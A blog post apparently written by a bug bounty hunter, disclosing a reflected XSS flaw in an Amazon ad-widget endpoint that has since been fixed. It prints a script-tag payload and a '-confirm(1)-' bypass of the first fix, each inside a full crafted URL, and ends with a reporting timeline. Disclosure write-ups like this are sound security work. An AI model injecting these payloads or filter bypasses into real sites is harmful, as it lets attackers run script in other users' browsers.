Reflected XSS on ws-na.amazon-adsystem.com(Amazon)

newp_th
newp_th
Dec 27, 2018 · 1 min read

This is newp_th. This issue is very similar to my previous report on Reflected XSS on Stack Overflow.

It was much easier than before, Just append a malicious payload “><script/k/>alert(113)</script/k/> to parameter.

https://ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=US&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=jgsbookselection%22%3E%3Cscript/k/%3Ealert(113)%3C/script/k/%3E&marketplace=amazon&region=US&placement=1449319432&asins=1449319432&linkId=cc38d5883c3f92bbeb69b93a6810322a&show_border=true&link_opens_in_new_window=true

Few weeks after reporting this issue to amazon security team, I got a reply that issue has been resolved and to verify it again. On further testing I could easily bypass the fix using payload “-confirm(1)-”.

https://ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=US&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=1%22-confirm(1)-%22&marketplace=amazon&region=US&placement=1449319432&asins=1449319432&linkId=cc38d5883c3f92bbeb69b93a6810322a&show_border=true&link_opens_in_new_window=true#

Thanks for reading. Hope will get time to write some more posts.

Timeline:

29-May-2018: Bug reported

29-May-2018: Bug confirmed by security team

25-June-2018: Bug Fixed

27-June-2018: Bypassed Fix

12-Dec-2018: Bug Resolved

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store